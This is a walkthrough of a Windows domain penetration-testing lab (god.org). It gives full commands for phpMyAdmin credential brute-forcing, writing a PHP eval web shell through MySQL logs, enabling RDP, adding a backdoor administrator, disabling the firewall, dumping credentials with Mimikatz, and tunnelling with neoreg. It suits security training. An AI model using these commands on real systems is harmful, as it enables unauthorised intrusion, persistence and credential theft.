Configure the lab's domain controller to bind its IPv4 address to the Host-Only network adapter and ensure its listed first in the adapter order. Target systems include Win7, Win2003, and Win2008. During login to Win2003 and Win2008, password expiration prompts appear; update them to hongrisec@2020. The Host-Only subnet is 192.168.25.*, while the Win7 NAT interface uses 192.168.88.128.

Begin with reconnaissance: enumerate open ports and perform directory fuzzing. Use credential brute-force tools such as Metasploit, noting that false positives may still permit successful logins—capture those credentials for reuse.

msfconsole
search auxiliary login
use auxiliary/scanner/http/phpmyadmin_login
options
rhosts => 192.168.88.128
pass_file => /opt/creds.txt
targeturi => /phpMyAdmin/index.php
threads => 2
run

Common techniques to achieve PHPMyAdmin shell upload:

1. Direct query-based web shell injection.
2. Leverage general query log to write a payload.
3. Exploit slow query log for shell creation.
4. Abuse error log output for code execution.
5. Trigger local file inclusion in PHPMyAdmin 4.8.x.

Identify web root via phpinfo(): C:/phpStudy/WWW/phpinfo.php. Check secure_file_priv:

SHOW VARIABLES LIKE 'secure_file_priv';

If value is NULL, MySQL disallows file import/export. Switch to general log method:

SHOW VARIABLES LIKE 'general%';
SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = 'C:/phpStudy/WWW/shell.php';
SELECT '<?php @eval($_POST["x"]); ?>';

These steps create a usable backdoor at the web root.

An additional web application exists beyond initial scans. Manual inspection reveals a template editor. Inserting <?php eval($_POST[exec]); ?> at the top of a PHP file grants shell access. Browsing to exposed directories via robots.txt leads to further entry points. Template editing can also be used for shell deployment.

Proceed to internal network enumeration:

ipconfig /all
route print
net view
arp -a
net start
net share
net share ipc$
net share c$
net use \\192.168.52.X\ipc$ "" /user:"";
net use \\192.168.52.X\c$ "pwd" /user:"user";
dir \\192.168.52.X\c$\users
net config workstation
net user
net user /domain
net localgroup administrators
net view /domain
net user username /domain
net group /domain
net group "domain admins" /domain
net group "domain computers" /domain
net group "domain controllers" /domain

Domain identified as god.org, domain controller machine OWA$, domain admin account Administrator, internal range 192.168.52.0/24. Verify DC IP:

ping owa.god.org

Check RDP status:

netstat -ano | findstr "3389"
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

Create privileged user:

net user pentest Pwd123! /add
net localgroup Administrators pentest /add

RDP connection blocked likely due to firewall. Disable filtering:

netsh advfirewall set allprofiles state off
netsh advfirewall show allprofiles

Remote desktop becomes accessible. In real scenarios, pivot through a public-facing server instead of direct LAN C2 due to NAT isolation.

Deploy beacon payload via public server, transfer to target using AntSword, then activate:

cd beacon_dir
start beacon.exe

Use Mimikatz plugin to extract cleartext domain admin password hongrisec@2020. Enumerate live hosts in 192.168.52.0/24:

for /L %i in (1,1,254) do @ping -w 1 -n 1 192.168.52.%i | findstr "TTL="

Three hosts respond. As they lack outbound connectivity, establish a SOCKS proxy via reGeorg and ProxyChains:

# Generate tunnel script
python3 neoreg.py generate -k tunnelkey
# Upload to pivot host
python3 neoreg.py -k tunnelkey -u http://192.168.192.197/tunnel.php

Configure /etc/proxychains.conf to use the reGeorg SOCKS listener, enabling internal tool chaining through the compromised node.